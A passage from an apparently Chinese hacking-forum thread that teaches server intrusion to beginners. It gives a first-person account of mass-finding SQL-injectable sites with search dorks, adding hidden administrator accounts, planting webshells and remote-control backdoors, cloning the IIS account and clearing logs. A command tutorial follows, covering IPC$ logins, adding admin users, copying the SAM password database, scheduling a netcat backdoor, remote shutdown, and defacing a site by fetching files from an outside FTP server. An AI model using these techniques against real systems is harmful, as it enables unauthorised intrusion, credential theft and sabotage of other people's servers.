一栏中填入对方IP，User与Pass中填入你所得到的用户名与密码。format选择xp_cmdshell”%s”即可。然后点击connect，连接上后就可以在CMD一栏中输入你想要的CMD命令了 19.asp.dll   引用：因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll   (不同的机子放的位置不一定相同)  我们现在加进去c script  adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"  好了,现在你可以用c script  adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去  了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:\Inetpub\Admin script s>这个目录下.  那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.  20.Magic Winmail    前提是你要有个webshell 引用： http://www.eviloctal.com/forum/read.php?tid=3587这里去看吧  21.DBO……      其实 提升权限的方式很多的 就看大家怎么利用了 HOHO 加油吧 将服务器控制到底  Re:[攻册]黑客高手必懂基础内容 菜鸟＋Sa＋注入工具组合＝肉鸡成群 现在，注入漏洞异常火爆，不少黑友都利用该漏洞过了一把黑客瘾，并拥有了不少自己的肉鸡。不过对于小菜们来说，注入入侵也并不是那么一帆风顺，尤其是在注入点的寻找以及获得WebShell后的提升权限问题上。在这里，我给广大初学注入入侵的小菜们提供一种快速获取sa权限注入点入侵目标主机的办法。高手可以跳过本文，或者就当是复习吧。 获取注入点的方法不外乎两种：手工寻找和利用注入工具寻找。对于前者，多数是用搜索引擎来找特定的网址（形如xxx.asp?xxid=），对于后者，则是针对具体某个站点用注入工具扫描注入点。不过，你有没有考虑过把这两种方法结合起来使用呢？我就倾向于二者的组合使用，方法如下： 在阿D注入工具中的“扫描注入点”功能模块的地址栏里输入并转到google的网址，选择“高级搜索”，在搜索结果栏中选择“100项结果”，语言选择“简体中文”，关键字填：xxx inurl:asp或是inurl:XX.asp?id=、inurl:xxx.asp?xxid等，这些都是我们常见的可能存在注入点的网址形式，我输入的是ert inurl:asp（有人说这个关键字容易找到sa权限，不知是真是假，但我确实找到了不少）。点击搜索后，在注入点一栏中马上就会显示出N多的有注入点的网址。 在第一页中就显示找到了20几个（20%），从头开始试，检测一下，是不是sa权限，若不是可先跳过。因为本文讲的是sa权限，所以在这里我们只找有sa权限注入点的网站，以省去菜鸟们在注入时因一些权限问题而导致入侵卡住的情况。也许有人要问了，有那么多sa权限注入点的网站吗？根据我的个人经验，只要你的关键字设的好，每100项中就有20几个（约20%）有注入漏洞的网站，在这些网站中又有5个左右（约5%）是有sa权限的。试想想，只要我们的关键字设的好，google可以搜索到的结果何止是100项，一般的搜索结果都在1万项以上，这样算来，我们的目标就有成百上千呀（小菜高呼：哇！发财了！），就怕你没有那么多的精力去注入全部的网站，呵呵！我马上就找到了一个（运气好呀，可以去买票了，说不定是头奖呢？呵呵，又一个百万富翁！什么？现在百万富翁不算啥？要不，你给我一百万？！）。将这个网址复制到明小子的domain3.2中进行检测，也确实是sa权限，跟阿D注入工具显示的一样。 用domain的命令行功能查看一下开放的端口，发现开放了21、23、80、1433、3389等端口，看来我今天运气的确不错呀！加个账号admin$，但由于管理员已经远程登录3389。 看来我暂时不要登录的为好。再看看有没有其它可以利用的东西，用阿D注入工具的目录浏览功能看了一下（个人感觉这方面阿D注入工具要比domain好！明小子怒目圆睁，大叫：你收了阿D多少好处！）忽然眼睛一亮，发现D盘有一个wwwroot目录，并且里面有一个目录和网站名一样。 呵呵，好东西呀，向里面写入个asp木马试试，浏览文件也好方便一些。但接下来让我郁闷的是明明提示已经上传成功。 但在浏览器中输入它的地址却提示没有该文件，而且到了后来，domain的命令行功能反馈回来的信息也变得非常凌乱，不知道是怎么回事。于是想换个cmdshell，又想起它开了23端口，用telnet连接了一下，发现有ntlm认证。呵呵，老办法，在本地新建一个admin$账号，密码和目标主机上的一样，再用这个账号运行cmd.exe，telnet到目标主机——连接成功，用query user查看了一下终端情况，发现有一个会话处于断开状态，于是我便用3389连接了一下，却提示3389已经达到了最大连接数！我晕，看来有连接数限制，干脆把这个会话结束掉，反正它也断开了，浪费资源！呵呵，输入logoff 2（它的会话ID），然后用3389登录试试，登录成功。 本想入侵到这里就结束的，但看了一下这台主机的配置：P4 3.0，512M内存，我就不禁流口水了，这样的主机放过了就可惜了，是极品呀，于是就又有了下文的一些曲折！ 用3389进来后，本想在上面安装Radmin，但发现程序菜单里已经有了，看来是管理员远程控制用的，此路显然是不通了。突然想起Radmin的密码文件是存在注册表里的，虽然是加了密的，但现在已经有了Radmin密码的暴力破解工具，把它在注册表中的密码键值读取出来保存到一个临时文件。 然后编辑这个文件，直接通过3389复制粘贴到本地，用破解软件跑了半天，没有结果，看来管理员设的Radmin密码也不弱智呀！ 算了，再找别的思路吧！在上面装个rmtsvc？这也是远程控制软件中的精品呀！怎么上传呢，在本地开个FTP，然后通过3389打开一个cmd进行登录，发现半天没有反应，它上面有Serv-U，加个账号再在本地连接试试，也是没反应！毕竟是个人气还挺旺的游戏网站嘛，连接的人太多，看来是网速受影响了！没办法，前面不是有个1433端口开放了吗？呵呵，不是还知道它的网站文件所在的目录了吗？找数据库连接文件呗——地球人都知道！我找呀找呀找呀找，找到一个好朋友：connin.asp，打开看了看，密码就乖乖地躺在里面呢。 马上用SQLTools连接上，发现一点击上传文件后，也是就卡住了，看来网速的确是受影响了，总不能为了让网络流量小一点，就让我把目标主机强行重启吧？我可是有点怕怕呀，呵呵！怎么办呢？ 正当无奈之际，突然看到了桌面上的IE浏览器，于是灵光一闪，真是山重水复疑无路，柳暗花明又一村，终于找到救星了！马上用它从网上下载了一个rmtsvc装上。呵呵，终于成功安装！整了半天，我咋就没想到利用IE直接上网去下载呢？ 到这，我已经完全控制了这台主机。不过，为了保险起见，通过3389，我把海洋2006木马的代码复制过去，保存在网站目录下，并且，我发现该网站有Dvbbs论坛，于是我用前面找到的数据库连接密码，用MSSQL Server的查询分析器连上去，读取出后台管理密码，可惜是经过加密了的，有总比没有好。 然后克隆IIS的默认账号为管理员。这样，就安全多了，呵呵，万一肉鸡丢了，还可以再找回来。由于在上面操作过程中下载过东西，把IE的记录全删掉，同时处理一下日志，闪人！  总结： 1．刚开始学注入的小菜们，大多是通过搜索引擎漫无边际地找注入点，比较费力！本文的阿D注入工具配合Google搜索引擎批量找注入点可以节省不少的时间，而且也很容易找到有sa权限注入点的网站，毕竟搜索引擎找到的结果数量还是相当惊人的，不过在查找关键字上就要多总结技巧，从而最大限度的找到更多的有sa权限注入点的网站！当然，我们也可以用domain来批量检测，不过个人感觉相比阿D注入工具，Domain找到的注入网站要少一点，而且列目录功能也没有阿D注入工具好用。不过，对于命令行功能domain就要略胜一筹了，也可能是我用的阿D注入工具的破解问题或是版本问题　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　吧。因此，在这里，我推荐大家把这两款工具结合起来使用，取二者的长处：通过搜索引擎找有注入点的网站和列目录功能用阿D的注入工具，执行命令功能用domain，这样的工具组合，更能提高我们的入侵效率！ 2．对于上传文件不一定局限于在本地和目标主机之间传输文件，也可以在目标主机上直接从网上下载文件。像我本文后半部分的入侵就是。 3．最后，尽量在肉鸡上多放两个后门，以便肉鸡丢失后找回肉鸡之用。 4．对于入侵，最重要的是思路，一个思路不行时，要学会从多方面考虑，这样我们的黑客技术才能提高！ 5．在找到注入点后，不要习惯性地先去找后台密码，再用后台密码登录上传WebShell去提升权限，要先看看是不是sa权限，因为如果是sa权限的话，我们的权限是很高的，要先试试能不能执行系统级命令如添加管理员账号、开telnet服务等，同时要注意它的3389服务是不是已经开放。从而避免一些不必要的弯路。 最后，希望小菜们能通过本文有所启示，也祝愿广大黑友们肉鸡多多！更希望国内的网站管理员们多关注一下网络安全！ 来PK我 HP : 79 / 125  Re:[攻册]黑客高手必懂基础内容 1：NET ping 命令的使用  ??Ping是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据报。根据返回的信息，你就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数据报交换并不表示TCP/IP配置就是正确的，你必须执行大量的本地主机与远程主机的数据报交换，才能确信TCP/IP的正确性。  ??简单的说，Ping就是一个测试程序，如果Ping运行正确，你大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障，从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送，Ping也被某些别有用心的人作为DDOS（拒绝服务攻击）的工具，前段时间Yahoo就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。  ??按照缺省设置，Windows上运行的Ping命令发送4个ICMP（网间控制报文协议）回送请求，每个32字节数据，如果一切正常，你应能得到4个回送应答。  ??Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络连接速度比较快。Ping还能显示TTL（Time To Live存在时间）值，你可以通过TTL值推算一下数据包已经通过了多少个路由器：源地点TTL起始值（就是比返回TTL略大的一个2的乘方数）-返回时TTL值。例如，返回TTL值为119，那么可以推算数据报离开源地址的TTL起始值为128，而源地点到目标地点要通过9个路由器网段（128-119）；如果返回TTL值为246，TTL起始值就是256，源地点到目标地点要通过9个路由器网段。  通过Ping检测网络故障的典型次序  ??正常情况下，当你使用Ping命令来查找问题所在或检验网络运行情况时，你需要使用许多Ping命令，如果所有都运行正确，你就可以相信基本的连通性和配置参数没有问题；如果某些Ping命令出现运行故障，它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障：  ping 127.0.0.1--这个Ping命令被送到本地计算机的IP软件，该命令永不退出该计算机。如果没有做到这一点，就表示TCP/IP的安装或运行存在某些最基本的问题。  ping 本机IP--这个命令被送到你计算机所配置的IP地址，你的计算机始终都应该对该Ping命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP地址。  ping 局域网内其他IP--这个命令应该离开你的计算机，经过网卡及网络电缆到达其他计算机，再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。  ping 网关IP--这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。  ping 远程IP--如果收到4个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。  ping localhost--localhost是个作系统的网络保留名，它是127.0.0.1的别名，每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件（/Windows/host）中存在问题。  ping  www.yahoo.com--对这个域名执行Pin ... 地址，通常是通过DNS 服务器 如果这里出现故障，则表示DNS服务器的IP地址配置不正确或DNS服务器有故障（对于拨号上网用户，某些ISP已经不需要设置DNS服务器了）。顺便说一句：你也可以利用该命令实现域名对IP地址的转换功能。  ??如果上面所列出的所有Ping命令都能正常运行，那么你对你的计算机进行本地和远程通信的功能基本上就可以放心了。但是，这些命令的成功并不表示你所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。  Ping命令的常用参数选项  ping IP -t--连续对IP地址执行Ping命令，直到被用户以Ctrl C中断。  ping IP -l 2000--指定Ping命令中的数据长度为2000字节，而不是缺省的32字节。  ping IP -n--执行特定次数的Ping命令。  Netstat ??Netstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据，一般用于检验本机各端口的网络连接情况。  如果你的计算机有时候接受到的数据报会导致出错数据删除或故障，你不必感到奇怪，TCP/IP可以容许这些类型的错误，并能够自动重发数据报。但如果累计的出错情况数目占到所接收的IP数据报相当大的百分比，或者它的数目正迅速增加，那么你就应该使用Netstat查一查为什么会出现这些情况了。  netstat 的一些常用选项：  netstat -s--本选项能够按照各个协议分别显示其统计数据。如果你的应用程序（如Web浏览器）运行速度比较慢，或者不能显示Web页之类的数据，那么你就可以用本选项来查看一下所显示的信息。你需要仔细查看统计数据的各行，找到出错的关键字，进而确定问题所在。  netstat -e--本选项用于显示关于以太网的统计数据。它列出的项目包括传送的数据报的总字节数、错误数、删除数、数据报的数量和广播的数量。这些统计数据既有发送的数据报数量，也有接收的数据报数量。这个选项可以用来统计一些基本的网络流量）。  netstat -r--本选项可以显示关于路由表的信息，类似于后面所讲使用route print命令时看到的 信息。除了显示有效路由外，还显示当前有效的连接。  netstat -a--本选项显示一个所有的有效连接信息列表，包括已建立的连接（ESTABLISHED），也包括监听连接请求（LISTENING）的那些连接。  netstat -n--显示所有已建立的有效连接。  Netstat的妙用  ??经常上网的人一般都使用ICQ的，不知道你有没有被一些讨厌的人骚扰得不敢上线，想投诉却又不知从和下手？其实，你只要知道对方的IP，就可以向他所属的ISP投诉了。但怎样才能通过ICQ知道对方的IP呢？如果对方在设置ICQ时选择了不显示IP地址，那你是无法在信息栏中看到的。其实，你只需要通过Netstat就可以很方便的做到这一点：当他通过ICQ或其他的工具与你相连时（例如你给他发一条ICQ信息或他给你发一条信息），你立刻在DOS Prompt下输入netstat -n或netstat -a就可以看到对方上网时所用的IP或ISP域名了。甚至连所用Port都完全暴露了，如果你想给他一些教训，这些信息已经足够……  IPConfig 的使用方法  IPConfig实用程序和它的等价图形用户界面——Windows 95/98中的WinIPCfg可用于显示当前的TCP/IP配置的设置值。这些信息一般用来检验人工配置的TCP/IP设置是否正确。但是，如果你的计算机和所在的局域网使用了动态主机配置协议（Dynamic Host Configuration Protocol，DHCP--Windows NT下的一种把较少的IP地址分配给较多主机使用的协议，类似于拨号上网的动态IP分配），这个程序所显示的信息也许更加实用。这时，IPConfig可以让你了解你的计算机是否成功的租用到一个IP地址，如果租用到则可以了解它目前分配到的是什么地址。了解计算机当前的IP地址、子网掩码和缺省网关实际上是进行测试和故障分析的必要项目。  最常用的选项：  ipconfig--当使用IPConfig时不带任何参数选项，那么它为每个已经配置了的接口显示IP地址、子网掩码和缺省网关值  ipconfig /all--当使用all选项时，IPConfig能为DNS和WINS服务器显示它已配置且所要使用的附加信息（如IP地址等），并且显示内置于本地网卡中的物理地址（MAC）。如果IP地址是从DHCP服务器租用的，IPConfig将显示DHCP服务器的IP地址和租用地址预计失效的日期（有关DHCP服务器的相关内容请详见其他有关NT服务器的书籍或询问你的网管），其输出信息见图6的下半部分。  ipconfig /release和ipconfig /renew--这是两个附加选项，只能在向DHCP服务器租用其IP地址的计算机上起作用。如果你输入ipconfig /release，那么所有接口的租用IP地址便重新交付给DHCP服务器（归还IP地址）。如果你输入ipconfig /renew，那么本地计算机便设法与DHCP服务器取得联系，并租用一个IP地址。请注意，大多数情况下网卡将被重新赋予和以前所赋予的相同的IP地址。  ??如果你使用的是Windows 95/98，那么你应该更习惯使用winipcfg而不是ipconfig，因为它是一个图形用户界面，而且所显示的信息与ipconfig相同，并且也提供发布和更新动态IP地址的选项 如果你购买了Windows NT Resource Kit（NT资源包），那么Windows NT也包含了一个图形替代界面，该实用程序的名字是wntipcfg，和Windows 95/98的winipcfg类似。  arp tracert 的使用方法  ARP（地址转换协议）  ??ARP是一个重要的TCP/IP协议，并且用于确定对应IP地址的网卡物理地址。实用arp命令，你能够查看本地计算机或另一台计算机的ARP高速缓存中的当前内容。此外，使用arp命令，也可以用人工方式输入静态的网卡物理/IP地址对，你可能会使用这种方式为缺省网关和本地服务器等常用主机进行这项作，有助于减少网络上的信息量。  ??按照缺省设置，ARP高速缓存中的项目是动态的，每当发送一个指定地点的数据报且高速缓存中不存在当前项目时，ARP便会自动添加该项目。一旦高速缓存的项目被输入，它们就已经开始走向失效状态。例如，在Windows NT网络中，如果输入项目后不进一步使用，物理/IP地址对就会在2至10分钟内失效。因此，如果ARP高速缓存中项目很少或根本没有时，请不要奇怪，通过另一台计算机或路由器的ping命令即可添加。所以，需要通过arp命令查看高速缓存中的内容时，请最好先ping 此台计算机（不能是本机发送ping命令）。  常用命令选项：  arp -a或arp -g--用于查看高速缓存中的所有项目。-a和-g参数的结果是一样的，多年来-g一直是UNIX平台上用来显示ARP高速缓存中所有项目的选项，而Windows用的是arp -a（-a可被视为all，即全部的意思），但它也可以接受比较传统的-g选项。  arp -a IP--如果你有多个网卡，那么使用arp -a加上接口的IP地址，就可以只显示与该接口相关的ARP缓存项目。  arp -s IP 物理地址——你可以向ARP高速缓存中人工输入一个静态项目。该项目在计算机引导过程中将保持有效状态，或者在出现错误时，人工配置的物理地址将自动更新该项目。  arp -d IP--使用本命令能够人工删除一个静态项目。  ??看到这里，你也许已经有些累了……其实对于一般用户来说也已经足够——你可以用ipconfig和ping命令来查看自己的网络配置并判断是否正确、可以用netstat查看别人与你所建立的连接并找出ICQ使用者所隐藏的IP信息、可以用arp查看网卡的MAC地址——这些已足已让你丢掉菜鸟的头衔。如果你并不满足，那就“硬着头皮”（下面的内容可能有些枯燥）继续Follow me......  Tracert  ??当数据报从你的计算机经过多个网关传送到目的地时，Tracert命令可以用来跟踪数据报使用的路由（路径）。该实用程序跟踪的路径是源计算机到目的地的一条路径，不能保证或认为数据报总遵循这个路径。如果你的配置使用DNS，那么你常常会从所产生的应答中得到城市、地址和常见通信公司的名字。Tracert是一个运行得比较慢的命令（如果你指定的目标地址比较远），每个路由器你大约需要给它15秒钟  ??Tracert的使用很简单，只需要在tracert后面跟一个IP地址或URL，Tracert会进行相应的域名转换的。Tracert一般用来检测故障的位置，你可以用tracert IP在哪个环节上出了问题，虽然还是没有确定是什么问题，但它已经告诉了我们问题所在的地方，你也就可以很有把握的告诉别人——某某出了问题。  Route NBTStat Net 使用方法  Route  ??大多数主机一般都是驻留在只连接一台路由器的网段上。由于只有一台路由器，因此不存在使用哪一台路由器将数据报发表到远程计算机上去的问题，该路由器的IP地址可作为该网段上所有计算机的缺省网关来输入。  ??但是，当网络上拥有两个或多个路由器时，你就不一定想只依赖缺省网关了。实际上你可能想让你的某些远程IP地址通过某个特定的路由器来传递，而其他的远程IP则通过另一个路由器来传递。  ??在这种情况下，你需要相应的路由信息，这些信息储存在路由表中，每个主机和每个路由器都配有自己独一无二的路由表。大多数路由器使用专门的路由协议来交换和动态更新路由器之间的路由表。但在有些情况下，必须人工将项目添加到路由器和主机上的路由表中。Route就是用来显示、人工添加和修改路由表项目的。  一般使用选项：  route print--本命令用于显示路由表中的当前项目，在单路由器网段上的输出结果如图12，由于用IP地址配置了网卡，因此所有的这些项目都是自动添加的。  route add--使用本命令，可以将信路由项目添加给路由表。例如，如果要设定一个到目的网络209.98.32.33的路由，其间要经过5个路由器网段，首先要经过本地网络上的一个路由器，器IP为202.96.123.5，子网掩码为255.255.255.224，那么你应该输入以下命令：  route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5  route change--你可以使用本命令来修改数据的传输路由，不过，你不能使用本命令来改变数据的目的地。下面这个例子可以将数据的路由改到另一个路由器，它采用一条包含3个网段的更直的路径：  route add 209.98.32.33 mask 255.255.255.224 202.96.123.250 metric 3  route delete--使用本命令可以从路由表中删除路由。例如：route delete 209.98.32.33  NBTStat  ??NBTStat（TCP/IP上的NetBIOS统计数据）实用程序用于提供关于关于NetBIOS的统计数据。运用NetBIOS，你可以查看本地计算机或远程计算机上的NetBIOS名字表格。  常用选项：  nbtstat -n--显示寄存在本地的名字和服务程序  nbtstat -c--本命令用于显示NetBIOS名字高速缓存的内容。NetBIOS名字高速缓存用于寸放与本计算机最近进行通信的其他计算机的NetBIOS名字和IP地址对。  nbtstat -r--本命令用于清除和重新加载NetBIOS名字高速缓存。  nbtstat -a IP--通过IP显示另一台计算机的物理地址和名字列表，你所显示的内容就像对方计算机自己运行nbtstat -n一样  nbtstat -s IP--显示实用其IP地址的另一台计算机的NetBIOS连接表。  Net  ??Net命令有很多函数用于实用和核查计算机之间的NetBIOS连接。这里我只介绍最常用的两个：net view和net use。  net view UNC--运用此命令，你可以查看目标服务器上的共享点名字。任何局域网里的人都可以发出此命令，而且不需要提供用户ID或口令。UNC名字总是以\开头，后面跟随目标计算机的名字。例如，net view \\lx就是查看主机名为lx的计算机的共享点（见图15）。  net use 本地盘符 目标计算机共享点——本命令用于建立或取消到达特定共享点的映像驱动器的连接（如果需要，你必须提供用户ID或口令）。例如，你输入net use f: \lxmp3就是将映像驱动器F:连接到\lxmp3共享点上，今后你直接访问F:就可以访问\lxmp3共享点，这和你右击“我的电脑”选择映射网络驱动器类似.  只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！  这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1  net use \\127.0.0.1\ipc$ "123456" /user:"hbx"  退出的命令是  net use \\127.0.0.1\ipc$ /delte  下面的操作你必须登陆后才可以用.登陆的方法就在上面.  ----------------------  下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户.  我们加一个heibai的用户密码为lovechina  net user heibai lovechina /add  只要显示命令成功,那么我们可以把他加入Administrator组了.  Net localgroup Administrators heibai /add  ----------------------  这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.  Net use z:\\127.0.0.1\c$  ----------------------  net start telnet  这样可以打开对方的TELNET服务.  ----------------------  这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。  Net user guest /active:yes  ----------------------  这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！  Net user guest lovechina  net命令果然强大啊！  2:at  一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？  那么需要用AT命令，这里假设你已经登陆了那个服务器。  你首先要得到对方的时间，  net time \\127.0.0.1  将会返回一个时间，这里假设时间为12:1,现在需要新建一个作业，其ID=1  at \\127.0.0.1 12:3 nc.exe  这里假设了一个木马，名为NC.EXE,这个东西要在对方服务器上.  这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.  等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.  3:telnet  这个命令非常实用,它可以与远方做连接，不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.  Telnet 127.0.0.1 99  这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.  4:FTP  它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个 WWW.51.NET,不错的.当我们申请完后，它会给用户名,密码,以及FTP服务器.  在上传前需要登陆先，这里我们假设FTP服务器是 WWW.51.NET,用户名是HUCJS,密码是654321  ftp  www.51.net  他会要求输入用户,成功后会要求输入密码.  ----------------------  下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\  get c:\index.htm d:\  假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下  put c:\index.htm d:\  5:copy  下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。  这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下  copy index.htm \\127.0.0.1\c$\index.htm  ----------------------  如果你要复制到D盘下把C改为D，就行了！  Copy index.htm \\127.0.0.1\d$\index.htm  ----------------------  如果你要把他复制到WINNT目录里  就要把输入  copy index.htm \\127.0.0.1\admin$\index.htm  admin$是winnt  ----------------------  要把对方的文件复制过来，顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名  下面就把127.0.0.1的数据库复制到本地C盘下  copy \\127.0.0.1\admin$\repair\sam._ c:\  ----------------------  6：set  如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！  下面是我得到的结果！我来分析它，只是找主页在那而已。  COMPUTERNAME=PENTIUMII  ComSpec=D:\WINNT\system32\cmd.exe  CONTENT_LENGTH=0  GATEWAY_INTERFACE=CGI/1.1  HTTP_ACCEPT=*/*  HTTP_ACCEPT_LANGUAGE=zh-cn  HTTP_CONNECTION=Keep-Alive  HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了  HTTP_ACCEPT_ENCODING=gzip, deflate  HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)  NUMBER_OF_PROCESSORS=1  Os2LibPath=D:\WINNT\system32\os2\dll;  OS=Windows_NT  Path=D:\WINNT\system32;D:\WINNT  PATHEXT=.COM;.EXE;.BAT;.CMD  PATH_TRANSLATED=E:\vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot  PROCESSOR_ARCHITECTURE=x86  PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel  PROCESSOR_LEVEL=6  PROCESSOR_REVISION=0303  PROMPT=$P$G  QUERY_STRING=/c set  REMOTE_ADDR=XX.XX.XX.XX  REMOTE_HOST=XX.XX.XX.XX  REQUEST_METHOD=GET  script _NAME=/ script s/../../winnt/system32/cmd.exe  SERVER_NAME=XX.XX.XX.XX  SERVER_PORT=80  SERVER_PORT_SECURE=0  SERVER_PROTOCOL=HTTP/1.1  SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0  SystemDrive=D:  SystemRoot=D:\WINNT  TZ=GMT-9  USERPROFILE=D:\WINNT\Profiles\Default User  windir=D:\WINNT  粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个方法才能100%的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那么这就是主页的名称了。  7：nbtstat  如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！  现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。  命令是  nbtstat -A XX.XX.XX.XX  -A一定要大写哦。  下面是得到的结果。  NetBIOS Remote Machine Name Table  Name Type Status  ---------------------------------------------  Registered Registered Registered Registered Registered Registered Registered Reg  istered Registered Registered Registered  MAC Address = 00-E0-29-14-35-BA  PENTIUMII <00> UNIQUE  PENTIUMII <20> UNIQUE  ORAHOTOWN <00> GROUP  ORAHOTOWN <1C> GROUP  ORAHOTOWN <1B> UNIQUE  PENTIUMII <03> UNIQUE  Inet~Services <1C> GROUP  IS~PENTIUMII…<00> UNIQUE  ORAHOTOWN <1E> GROUP  ORAHOTOWN <1D> UNIQUE  ..__MSBROWSE__.<01> GROUP  粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是<03>的话，那他前面的就是用户。  这里的用户是PENTIUMII。  8：Shutdown  关了对方的NT服务器的命令  Shutdown \\IP地址 t:20  20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。  9：DIR  这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。  你可以本地试下。  10：echo  著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主机。  我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”写入index.htm，有2种方法，大家看看有什么区别。  Echo 南京大屠杀铁证如山，任何日本人不得抵赖！>index.htm  echo 南京大屠杀铁证如山，任何日本人不得抵赖！>>index.htm  第一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如山，任何日本人不得抵赖！”写进index.htm。  第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”加到index.htm里面。  “>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。  大家可以本地试下。  可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。  1、首先，我们需要申请一个免费的主页空间。  2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例。）  open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商会给你的）  cnhack（你申请时的用户名）  test（你申请时的密码）  get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm）  bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS）  具体的做法：  输入 echo open upload.chinaren.com> c:\cnhack.txt  输入 echo cnhack >> c:\cnhack.txt  输入 echo 39abs >> c:\cnhack.txt  输入 echo get index.htm c:\inetpub\wwwroot\index.htm >> c:\cnhack.txt  最后输入 ftp -s:c:\cnhack.txt （利用ftp的-s参数，执行文件里的内容。）  等命令完成时，文件已经下载到你指定的文件里了。  注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。）  记得要 del c:\cnhack.txt  11:attrib  